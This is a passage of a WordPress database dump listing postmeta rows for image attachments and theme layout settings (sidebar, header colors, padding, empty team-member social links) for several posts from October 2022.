(7640,2532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:114;s:6:\"height\";i:151;s:4:\"file\";s:15:\"2022/10/1-5.jpg\";s:8:\"filesize\";i:30035;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7641,2531,'_thumbnail_id','2532'),
(7642,2531,'_edit_last','1'),
(7643,2531,'_dt_sidebar_position','disabled'),
(7644,2531,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7645,2531,'_dt_sidebar_hide_on_mobile','0'),
(7646,2531,'_dt_footer_show','1'),
(7647,2531,'_dt_footer_widgetarea_id','sidebar_2'),
(7648,2531,'_dt_footer_hide_on_mobile','0'),
(7649,2531,'_dt_header_title','fancy'),
(7650,2531,'_dt_header_background','normal'),
(7651,2531,'_dt_header_background_below_slideshow','disabled'),
(7652,2531,'_dt_header_transparent_bg_color_scheme','light'),
(7653,2531,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7654,2531,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7655,2531,'_dt_header_transparent_bg_color','#000000'),
(7656,2531,'_dt_header_transparent_bg_opacity','50'),
(7657,2531,'_dt_header_disabled_background','normal'),
(7658,2531,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7659,2531,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7660,2531,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7661,2531,'_dt_header_disabled_transparent_bg_color','#000000'),
(7662,2531,'_dt_header_disabled_transparent_bg_opacity','50'),
(7663,2531,'_dt_page_overrides_top_margin',''),
(7664,2531,'_dt_page_overrides_right_margin',''),
(7665,2531,'_dt_page_overrides_bottom_margin',''),
(7666,2531,'_dt_page_overrides_left_margin',''),
(7667,2531,'_dt_mobile_page_padding_top',''),
(7668,2531,'_dt_mobile_page_padding_right',''),
(7669,2531,'_dt_mobile_page_padding_bottom',''),
(7670,2531,'_dt_mobile_page_padding_left',''),
(7671,2531,'_dt_teammate_options_go_to_single','1'),
(7672,2531,'_dt_teammate_options_position',''),
(7673,2531,'_dt_teammate_options_website',''),
(7674,2531,'_dt_teammate_options_mail',''),
(7675,2531,'_dt_teammate_options_facebook',''),
(7676,2531,'_dt_teammate_options_twitter',''),
(7677,2531,'_dt_teammate_options_dribbble',''),
(7678,2531,'_dt_teammate_options_you-tube',''),
(7679,2531,'_dt_teammate_options_rss',''),
(7680,2531,'_dt_teammate_options_delicious',''),
(7681,2531,'_dt_teammate_options_flickr',''),
(7682,2531,'_dt_teammate_options_lastfm',''),
(7683,2531,'_dt_teammate_options_linkedin',''),
(7684,2531,'_dt_teammate_options_vimeo',''),
(7685,2531,'_dt_teammate_options_tumbler',''),
(7686,2531,'_dt_teammate_options_pinterest',''),
(7687,2531,'_dt_teammate_options_devian',''),
(7688,2531,'_dt_teammate_options_skype',''),
(7689,2531,'_dt_teammate_options_github',''),
(7690,2531,'_dt_teammate_options_instagram',''),
(7691,2531,'_dt_teammate_options_stumbleupon',''),
(7692,2531,'_dt_teammate_options_behance',''),
(7693,2531,'_dt_teammate_options_px-500',''),
(7694,2531,'_dt_teammate_options_tripedvisor',''),
(7695,2531,'_dt_teammate_options_vk',''),
(7696,2531,'_dt_teammate_options_foursquare',''),
(7697,2531,'_dt_teammate_options_xing',''),
(7698,2531,'_dt_teammate_options_weibo',''),
(7699,2531,'_dt_teammate_options_odnoklassniki',''),
(7700,2531,'_dt_teammate_options_research-gate',''),
(7701,2531,'_dt_teammate_options_yelp',''),
(7702,2531,'_dt_teammate_options_blogger',''),
(7703,2531,'_dt_teammate_options_soundcloud',''),
(7704,2531,'_dt_teammate_options_viber',''),
(7705,2531,'_dt_teammate_options_whatsapp',''),
(7706,2531,'_dt_teammate_options_reddit',''),
(7707,2531,'_dt_teammate_options_snapchat',''),
(7708,2531,'_dt_teammate_options_telegram',''),
(7709,2533,'_edit_lock','1675477742:1'),
(7710,2534,'_wp_attached_file','2022/10/2-3.jpg'),
(7711,2534,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:115;s:6:\"height\";i:151;s:4:\"file\";s:15:\"2022/10/2-3.jpg\";s:8:\"filesize\";i:25133;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7712,2533,'_thumbnail_id','2534'),
(7713,2533,'_edit_last','1'),
(7714,2533,'_dt_sidebar_position','disabled'),
(7715,2533,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7716,2533,'_dt_sidebar_hide_on_mobile','0'),
(7717,2533,'_dt_footer_show','1'),
(7718,2533,'_dt_footer_widgetarea_id','sidebar_2'),
(7719,2533,'_dt_footer_hide_on_mobile','0'),
(7720,2533,'_dt_header_title','fancy'),
(7721,2533,'_dt_header_background','normal'),
(7722,2533,'_dt_header_background_below_slideshow','disabled'),
(7723,2533,'_dt_header_transparent_bg_color_scheme','light'),
(7724,2533,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7725,2533,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7726,2533,'_dt_header_transparent_bg_color','#000000'),
(7727,2533,'_dt_header_transparent_bg_opacity','50'),
(7728,2533,'_dt_header_disabled_background','normal'),
(7729,2533,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7730,2533,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7731,2533,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7732,2533,'_dt_header_disabled_transparent_bg_color','#000000'),
(7733,2533,'_dt_header_disabled_transparent_bg_opacity','50'),
(7734,2533,'_dt_page_overrides_top_margin',''),
(7735,2533,'_dt_page_overrides_right_margin',''),
(7736,2533,'_dt_page_overrides_bottom_margin',''),
(7737,2533,'_dt_page_overrides_left_margin',''),
(7738,2533,'_dt_mobile_page_padding_top',''),
(7739,2533,'_dt_mobile_page_padding_right',''),
(7740,2533,'_dt_mobile_page_padding_bottom',''),
(7741,2533,'_dt_mobile_page_padding_left',''),
(7742,2533,'_dt_teammate_options_go_to_single','1'),
(7743,2533,'_dt_teammate_options_position',''),
(7744,2533,'_dt_teammate_options_website',''),
(7745,2533,'_dt_teammate_options_mail',''),
(7746,2533,'_dt_teammate_options_facebook',''),
(7747,2533,'_dt_teammate_options_twitter',''),
(7748,2533,'_dt_teammate_options_dribbble',''),
(7749,2533,'_dt_teammate_options_you-tube',''),
(7750,2533,'_dt_teammate_options_rss',''),
(7751,2533,'_dt_teammate_options_delicious',''),
(7752,2533,'_dt_teammate_options_flickr',''),
(7753,2533,'_dt_teammate_options_lastfm',''),
(7754,2533,'_dt_teammate_options_linkedin',''),
(7755,2533,'_dt_teammate_options_vimeo',''),
(7756,2533,'_dt_teammate_options_tumbler',''),
(7757,2533,'_dt_teammate_options_pinterest',''),
(7758,2533,'_dt_teammate_options_devian',''),
(7759,2533,'_dt_teammate_options_skype',''),
(7760,2533,'_dt_teammate_options_github',''),
(7761,2533,'_dt_teammate_options_instagram',''),
(7762,2533,'_dt_teammate_options_stumbleupon',''),
(7763,2533,'_dt_teammate_options_behance',''),
(7764,2533,'_dt_teammate_options_px-500',''),
(7765,2533,'_dt_teammate_options_tripedvisor',''),
(7766,2533,'_dt_teammate_options_vk',''),
(7767,2533,'_dt_teammate_options_foursquare',''),
(7768,2533,'_dt_teammate_options_xing',''),
(7769,2533,'_dt_teammate_options_weibo',''),
(7770,2533,'_dt_teammate_options_odnoklassniki',''),
(7771,2533,'_dt_teammate_options_research-gate',''),
(7772,2533,'_dt_teammate_options_yelp',''),
(7773,2533,'_dt_teammate_options_blogger',''),
(7774,2533,'_dt_teammate_options_soundcloud',''),
(7775,2533,'_dt_teammate_options_viber',''),
(7776,2533,'_dt_teammate_options_whatsapp',''),
(7777,2533,'_dt_teammate_options_reddit',''),
(7778,2533,'_dt_teammate_options_snapchat',''),
(7779,2533,'_dt_teammate_options_telegram',''),
(7780,2535,'_edit_lock','1670304831:1'),
(7781,2536,'_wp_attached_file','2022/10/3-2.jpg'),
(7782,2536,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:124;s:6:\"height\";i:151;s:4:\"file\";s:15:\"2022/10/3-2.jpg\";s:8:\"filesize\";i:27877;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7783,2535,'_thumbnail_id','2536'),
(7784,2535,'_edit_last','1'),
(7785,2535,'_dt_sidebar_position','disabled'),
(7786,2535,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7787,2535,'_dt_sidebar_hide_on_mobile','0'),
(7788,2535,'_dt_footer_show','1'),
(7789,2535,'_dt_footer_widgetarea_id','sidebar_2'),
(7790,2535,'_dt_footer_hide_on_mobile','0'),
(7791,2535,'_dt_header_title','fancy'),
(7792,2535,'_dt_header_background','normal'),
(7793,2535,'_dt_header_background_below_slideshow','disabled'),
(7794,2535,'_dt_header_transparent_bg_color_scheme','light'),
(7795,2535,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7796,2535,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7797,2535,'_dt_header_transparent_bg_color','#000000'),
(7798,2535,'_dt_header_transparent_bg_opacity','50'),
(7799,2535,'_dt_header_disabled_background','normal'),
(7800,2535,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7801,2535,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7802,2535,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7803,2535,'_dt_header_disabled_transparent_bg_color','#000000'),
(7804,2535,'_dt_header_disabled_transparent_bg_opacity','50'),
(7805,2535,'_dt_page_overrides_top_margin',''),
(7806,2535,'_dt_page_overrides_right_margin',''),
(7807,2535,'_dt_page_overrides_bottom_margin',''),
(7808,2535,'_dt_page_overrides_left_margin',''),
(7809,2535,'_dt_mobile_page_padding_top',''),
(7810,2535,'_dt_mobile_page_padding_right',''),
(7811,2535,'_dt_mobile_page_padding_bottom',''),
(7812,2535,'_dt_mobile_page_padding_left',''),
(7813,2535,'_dt_teammate_options_go_to_single','1'),
(7814,2535,'_dt_teammate_options_position',''),
(7815,2535,'_dt_teammate_options_website',''),
(7816,2535,'_dt_teammate_options_mail',''),
(7817,2535,'_dt_teammate_options_facebook',''),
(7818,2535,'_dt_teammate_options_twitter',''),
(7819,2535,'_dt_teammate_options_dribbble',''),
(7820,2535,'_dt_teammate_options_you-tube',''),
(7821,2535,'_dt_teammate_options_rss',''),
(7822,2535,'_dt_teammate_options_delicious',''),
(7823,2535,'_dt_teammate_options_flickr',''),
(7824,2535,'_dt_teammate_options_lastfm',''),
(7825,2535,'_dt_teammate_options_linkedin',''),
(7826,2535,'_dt_teammate_options_vimeo',''),
(7827,2535,'_dt_teammate_options_tumbler',''),
(7828,2535,'_dt_teammate_options_pinterest',''),
(7829,2535,'_dt_teammate_options_devian',''),
(7830,2535,'_dt_teammate_options_skype',''),
(7831,2535,'_dt_teammate_options_github',''),
(7832,2535,'_dt_teammate_options_instagram',''),
(7833,2535,'_dt_teammate_options_stumbleupon',''),
(7834,2535,'_dt_teammate_options_behance',''),
(7835,2535,'_dt_teammate_options_px-500',''),
(7836,2535,'_dt_teammate_options_tripedvisor',''),
(7837,2535,'_dt_teammate_options_vk',''),
(7838,2535,'_dt_teammate_options_foursquare',''),
(7839,2535,'_dt_teammate_options_xing',''),
(7840,2535,'_dt_teammate_options_weibo',''),
(7841,2535,'_dt_teammate_options_odnoklassniki',''),
(7842,2535,'_dt_teammate_options_research-gate',''),
(7843,2535,'_dt_teammate_options_yelp',''),
(7844,2535,'_dt_teammate_options_blogger',''),
(7845,2535,'_dt_teammate_options_soundcloud',''),
(7846,2535,'_dt_teammate_options_viber',''),
(7847,2535,'_dt_teammate_options_whatsapp',''),
(7848,2535,'_dt_teammate_options_reddit',''),
(7849,2535,'_dt_teammate_options_snapchat',''),
(7850,2535,'_dt_teammate_options_telegram',''),
(7851,2537,'_edit_lock','1675926256:1'),
(7852,2538,'_wp_attached_file','2022/10/2-4-e1665761362580.jpg'),
(7853,2538,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:115;s:6:\"height\";i:151;s:4:\"file\";s:30:\"2022/10/2-4-e1665761362580.jpg\";s:8:\"filesize\";i:25133;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7854,2537,'_thumbnail_id','2790'),
(7855,2537,'_edit_last','1'),
(7856,2537,'_dt_sidebar_position','disabled'),
(7857,2537,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7858,2537,'_dt_sidebar_hide_on_mobile','0'),
(7859,2537,'_dt_footer_show','1'),
(7860,2537,'_dt_footer_widgetarea_id','sidebar_2'),
(7861,2537,'_dt_footer_hide_on_mobile','0'),
(7862,2537,'_dt_header_title','fancy'),
(7863,2537,'_dt_header_background','normal'),
(7864,2537,'_dt_header_background_below_slideshow','disabled'),
(7865,2537,'_dt_header_transparent_bg_color_scheme','light'),
(7866,2537,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7867,2537,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7868,2537,'_dt_header_transparent_bg_color','#000000'),
(7869,2537,'_dt_header_transparent_bg_opacity','50'),
(7870,2537,'_dt_header_disabled_background','normal'),
(7871,2537,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7872,2537,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7873,2537,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7874,2537,'_dt_header_disabled_transparent_bg_color','#000000'),
(7875,2537,'_dt_header_disabled_transparent_bg_opacity','50'),
(7876,2537,'_dt_page_overrides_top_margin',''),
(7877,2537,'_dt_page_overrides_right_margin',''),
(7878,2537,'_dt_page_overrides_bottom_margin',''),
(7879,2537,'_dt_page_overrides_left_margin',''),
(7880,2537,'_dt_mobile_page_padding_top',''),
(7881,2537,'_dt_mobile_page_padding_right',''),
(7882,2537,'_dt_mobile_page_padding_bottom',''),
(7883,2537,'_dt_mobile_page_padding_left',''),
(7884,2537,'_dt_teammate_options_go_to_single','1'),
(7885,2537,'_dt_teammate_options_position',''),
(7886,2537,'_dt_teammate_options_website',''),
(7887,2537,'_dt_teammate_options_mail',''),
(7888,2537,'_dt_teammate_options_facebook',''),
(7889,2537,'_dt_teammate_options_twitter',''),
(7890,2537,'_dt_teammate_options_dribbble',''),
(7891,2537,'_dt_teammate_options_you-tube',''),
(7892,2537,'_dt_teammate_options_rss',''),
(7893,2537,'_dt_teammate_options_delicious',''),
(7894,2537,'_dt_teammate_options_flickr',''),
(7895,2537,'_dt_teammate_options_lastfm',''),
(7896,2537,'_dt_teammate_options_linkedin',''),
(7897,2537,'_dt_teammate_options_vimeo',''),
(7898,2537,'_dt_teammate_options_tumbler',''),
(7899,2537,'_dt_teammate_options_pinterest',''),
(7900,2537,'_dt_teammate_options_devian',''),
(7901,2537,'_dt_teammate_options_skype',''),
(7902,2537,'_dt_teammate_options_github',''),
(7903,2537,'_dt_teammate_options_instagram',''),
(7904,2537,'_dt_teammate_options_stumbleupon',''),
(7905,2537,'_dt_teammate_options_behance',''),
(7906,2537,'_dt_teammate_options_px-500',''),
(7907,2537,'_dt_teammate_options_tripedvisor',''),
(7908,2537,'_dt_teammate_options_vk',''),
(7909,2537,'_dt_teammate_options_foursquare',''),
(7910,2537,'_dt_teammate_options_xing',''),
(7911,2537,'_dt_teammate_options_weibo',''),
(7912,2537,'_dt_teammate_options_odnoklassniki',''),
(7913,2537,'_dt_teammate_options_research-gate',''),
(7914,2537,'_dt_teammate_options_yelp',''),
(7915,2537,'_dt_teammate_options_blogger',''),
(7916,2537,'_dt_teammate_options_soundcloud',''),
(7917,2537,'_dt_teammate_options_viber',''),
(7918,2537,'_dt_teammate_options_whatsapp',''),
(7919,2537,'_dt_teammate_options_reddit',''),
(7920,2537,'_dt_teammate_options_snapchat',''),
(7921,2537,'_dt_teammate_options_telegram',''),
(7922,2539,'_edit_lock','1665294246:1'),
(7923,2540,'_wp_attached_file','2022/10/2-5.jpg'),
(7924,2540,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:193;s:6:\"height\";i:193;s:4:\"file\";s:15:\"2022/10/2-5.jpg\";s:8:\"filesize\";i:39159;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4398;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7925,2539,'_thumbnail_id','2540'),
(7926,2539,'_edit_last','1'),
(7927,2539,'_dt_sidebar_position','disabled'),
(7928,2539,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7929,2539,'_dt_sidebar_hide_on_mobile','0'),
(7930,2539,'_dt_footer_show','1'),
(7931,2539,'_dt_footer_widgetarea_id','sidebar_2'),
(7932,2539,'_dt_footer_hide_on_mobile','0'),
(7933,2539,'_dt_header_title','fancy'),
(7934,2539,'_dt_header_background','normal'),
(7935,2539,'_dt_header_background_below_slideshow','disabled'),
(7936,2539,'_dt_header_transparent_bg_color_scheme','light'),
(7937,2539,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7938,2539,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7939,2539,'_dt_header_transparent_bg_color','#000000'),
(7940,2539,'_dt_header_transparent_bg_opacity','50'),
(7941,2539,'_dt_header_disabled_background','normal'),
(7942,2539,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7943,2539,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7944,2539,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7945,2539,'_dt_header_disabled_transparent_bg_color','#000000'),
(7946,2539,'_dt_header_disabled_transparent_bg_opacity','50'),
(7947,2539,'_dt_page_overrides_top_margin',''),
(7948,2539,'_dt_page_overrides_right_margin',''),
(7949,2539,'_dt_page_overrides_bottom_margin',''),
(7950,2539,'_dt_page_overrides_left_margin',''),
(7951,2539,'_dt_mobile_page_padding_top',''),
(7952,2539,'_dt_mobile_page_padding_right',''),
(7953,2539,'_dt_mobile_page_padding_bottom',''),
(7954,2539,'_dt_mobile_page_padding_left',''),
(7955,2539,'_dt_teammate_options_go_to_single','1'),
(7956,2539,'_dt_teammate_options_position',''),
(7957,2539,'_dt_teammate_options_website',''),
(7958,2539,'_dt_teammate_options_mail',''),
(7959,2539,'_dt_teammate_options_facebook',''),
(7960,2539,'_dt_teammate_options_twitter',''),
(7961,2539,'_dt_teammate_options_dribbble',''),
(7962,2539,'_dt_teammate_options_you-tube',''),
(7963,2539,'_dt_teammate_options_rss',''),
(7964,2539,'_dt_teammate_options_delicious',''),
(7965,2539,'_dt_teammate_options_flickr',''),
(7966,2539,'_dt_teammate_options_lastfm',''),
(7967,2539,'_dt_teammate_options_linkedin',''),
(7968,2539,'_dt_teammate_options_vimeo',''),
(7969,2539,'_dt_teammate_options_tumbler',''),
(7970,2539,'_dt_teammate_options_pinterest',''),
(7971,2539,'_dt_teammate_options_devian',''),
(7972,2539,'_dt_teammate_options_skype',''),
(7973,2539,'_dt_teammate_options_github',''),
(7974,2539,'_dt_teammate_options_instagram',''),
(7975,2539,'_dt_teammate_options_stumbleupon',''),
(7976,2539,'_dt_teammate_options_behance',''),
(7977,2539,'_dt_teammate_options_px-500',''),
(7978,2539,'_dt_teammate_options_tripedvisor',''),
(7979,2539,'_dt_teammate_options_vk',''),
(7980,2539,'_dt_teammate_options_foursquare',''),
(7981,2539,'_dt_teammate_options_xing',''),
(7982,2539,'_dt_teammate_options_weibo',''),
(7983,2539,'_dt_teammate_options_odnoklassniki',''),
(7984,2539,'_dt_teammate_options_research-gate',''),
(7985,2539,'_dt_teammate_options_yelp',''),
(7986,2539,'_dt_teammate_options_blogger',''),
(7987,2539,'_dt_teammate_options_soundcloud',''),
(7988,2539,'_dt_teammate_options_viber',''),
(7989,2539,'_dt_teammate_options_whatsapp',''),
(7990,2539,'_dt_teammate_options_reddit',''),
(7991,2539,'_dt_teammate_options_snapchat',''),
(7992,2539,'_dt_teammate_options_telegram',''),
(7993,2541,'_edit_lock','1665868534:1'),
(7994,2542,'_wp_attached_file','2022/10/1-6.jpg'),
(7995,2542,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:149;s:6:\"height\";i:197;s:4:\"file\";s:15:\"2022/10/1-6.jpg\";s:8:\"filesize\";i:31557;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-6-149x150.jpg\";s:5:\"width\";i:149;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4785;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7996,2541,'_thumbnail_id','2542'),
(7997,2541,'_edit_last','1'),
(7998,2541,'_dt_sidebar_position','disabled'),
(7999,2541,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8000,2541,'_dt_sidebar_hide_on_mobile','0'),
(8001,2541,'_dt_footer_show','1'),
(8002,2541,'_dt_footer_widgetarea_id','sidebar_2'),
(8003,2541,'_dt_footer_hide_on_mobile','0'),
(8004,2541,'_dt_header_title','fancy'),
(8005,2541,'_dt_header_background','normal'),
(8006,2541,'_dt_header_background_below_slideshow','disabled'),
(8007,2541,'_dt_header_transparent_bg_color_scheme','light'),
(8008,2541,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8009,2541,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8010,2541,'_dt_header_transparent_bg_color','#000000'),
(8011,2541,'_dt_header_transparent_bg_opacity','50'),
(8012,2541,'_dt_header_disabled_background','normal'),
(8013,2541,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8014,2541,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8015,2541,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8016,2541,'_dt_header_disabled_transparent_bg_color','#000000'),
(8017,2541,'_dt_header_disabled_transparent_bg_opacity','50'),
(8018,2541,'_dt_page_overrides_top_margin',''),
(8019,2541,'_dt_page_overrides_right_margin',''),
(8020,2541,'_dt_page_overrides_bottom_margin',''),
(8021,2541,'_dt_page_overrides_left_margin',''),
(8022,2541,'_dt_mobile_page_padding_top',''),
(8023,2541,'_dt_mobile_page_padding_right',''),
(8024,2541,'_dt_mobile_page_padding_bottom',''),
(8025,2541,'_dt_mobile_page_padding_left',''),
(8026,2541,'_dt_teammate_options_go_to_single','1'),
(8027,2541,'_dt_teammate_options_position',''),
(8028,2541,'_dt_teammate_options_website',''),
(8029,2541,'_dt_teammate_options_mail',''),
(8030,2541,'_dt_teammate_options_facebook',''),
(8031,2541,'_dt_teammate_options_twitter',''),
(8032,2541,'_dt_teammate_options_dribbble',''),
(8033,2541,'_dt_teammate_options_you-tube',''),
(8034,2541,'_dt_teammate_options_rss',''),
(8035,2541,'_dt_teammate_options_delicious',''),
(8036,2541,'_dt_teammate_options_flickr',''),
(8037,2541,'_dt_teammate_options_lastfm',''),
(8038,2541,'_dt_teammate_options_linkedin',''),
(8039,2541,'_dt_teammate_options_vimeo',''),
(8040,2541,'_dt_teammate_options_tumbler',''),
(8041,2541,'_dt_teammate_options_pinterest',''),
(8042,2541,'_dt_teammate_options_devian',''),
(8043,2541,'_dt_teammate_options_skype',''),
(8044,2541,'_dt_teammate_options_github',''),
(8045,2541,'_dt_teammate_options_instagram',''),
(8046,2541,'_dt_teammate_options_stumbleupon',''),
(8047,2541,'_dt_teammate_options_behance',''),
(8048,2541,'_dt_teammate_options_px-500',''),
(8049,2541,'_dt_teammate_options_tripedvisor',''),
(8050,2541,'_dt_teammate_options_vk',''),
(8051,2541,'_dt_teammate_options_foursquare',''),
(8052,2541,'_dt_teammate_options_xing',''),
(8053,2541,'_dt_teammate_options_weibo',''),
(8054,2541,'_dt_teammate_options_odnoklassniki',''),
(8055,2541,'_dt_teammate_options_research-gate',''),
(8056,2541,'_dt_teammate_options_yelp',''),
(8057,2541,'_dt_teammate_options_blogger',''),
(8058,2541,'_dt_teammate_options_soundcloud',''),
(8059,2541,'_dt_teammate_options_viber',''),
(8060,2541,'_dt_teammate_options_whatsapp',''),
(8061,2541,'_dt_teammate_options_reddit',''),
(8062,2541,'_dt_teammate_options_snapchat',''),
(8063,2541,'_dt_teammate_options_telegram',''),
(8064,2543,'_edit_lock','1665868032:1'),
(8065,2544,'_wp_attached_file','2022/10/2-6.jpg'),
(8066,2544,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:163;s:6:\"height\";i:198;s:4:\"file\";s:15:\"2022/10/2-6.jpg\";s:8:\"filesize\";i:34538;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4159;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8067,2543,'_thumbnail_id','2544'),
(8068,2543,'_edit_last','1'),
(8069,2543,'_dt_sidebar_position','disabled'),
(8070,2543,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8071,2543,'_dt_sidebar_hide_on_mobile','0'),
(8072,2543,'_dt_footer_show','1'),
(8073,2543,'_dt_footer_widgetarea_id','sidebar_2'),
(8074,2543,'_dt_footer_hide_on_mobile','0'),
(8075,2543,'_dt_header_title','fancy'),
(8076,2543,'_dt_header_background','normal'),
(8077,2543,'_dt_header_background_below_slideshow','disabled'),
(8078,2543,'_dt_header_transparent_bg_color_scheme','light'),
(8079,2543,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8080,2543,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8081,2543,'_dt_header_transparent_bg_color','#000000'),
(8082,2543,'_dt_header_transparent_bg_opacity','50'),
(8083,2543,'_dt_header_disabled_background','normal'),
(8084,2543,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8085,2543,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8086,2543,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8087,2543,'_dt_header_disabled_transparent_bg_color','#000000'),
(8088,2543,'_dt_header_disabled_transparent_bg_opacity','50'),
(8089,2543,'_dt_page_overrides_top_margin',''),
(8090,2543,'_dt_page_overrides_right_margin',''),
(8091,2543,'_dt_page_overrides_bottom_margin',''),
(8092,2543,'_dt_page_overrides_left_margin',''),
(8093,2543,'_dt_mobile_page_padding_top',''),
(8094,2543,'_dt_mobile_page_padding_right',''),
